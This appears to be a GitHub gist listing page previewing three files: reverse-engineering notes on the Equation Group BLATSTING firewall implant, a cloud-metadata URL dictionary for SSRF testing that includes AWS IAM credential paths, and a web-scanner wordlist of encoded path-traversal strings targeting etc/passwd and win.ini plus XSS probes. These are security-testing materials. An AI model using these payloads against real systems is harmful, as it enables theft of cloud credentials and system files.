This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Wladimir van der Laan 2016. This document is in the public domain. | |
| BLATSTING reverse-engineering notes. Based on files from the EQGRP free dump, | |
| more specifically in Firewall/BLATSTING/BLATSTING_201381/LP/lpconfig. | |
| In https://musalbas.com/2016/08/16/equation-group-firewall-operations-catalogue.html, | |
| BLATSTING is described as "A firewall software implant that is used with EGREGIOUSBLUNDER | |
| (Fortigate) and ELIGIBLEBACHELOR (TOPSEC)". | |
| If true, it's interesting how this implant can target both vendors. Presumably they both use the same Linux |
NMHai
/ cloud_metadata.txt
Created
May 1, 2018 22:29
— forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
NMHai
/ 360_website-security_scan_dic.txt
Created
March 25, 2018 08:54
— forked from 1a57danc3/360_website-security_scan_dic.txt
360_website-security_scan_dic
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /$ | |
| /%20..%5Cweb-inf | |
| /%22%3E%3CsCrIpT%3Eprompt(42873) | |
| /%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini | |
| /%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini | |
| /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd | |
| /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd | |
| /%3Cscript%20s%3Ealert(42873) | |
| /%3Cscript%3Ealert(42873).do | |
| /%3f.jsp |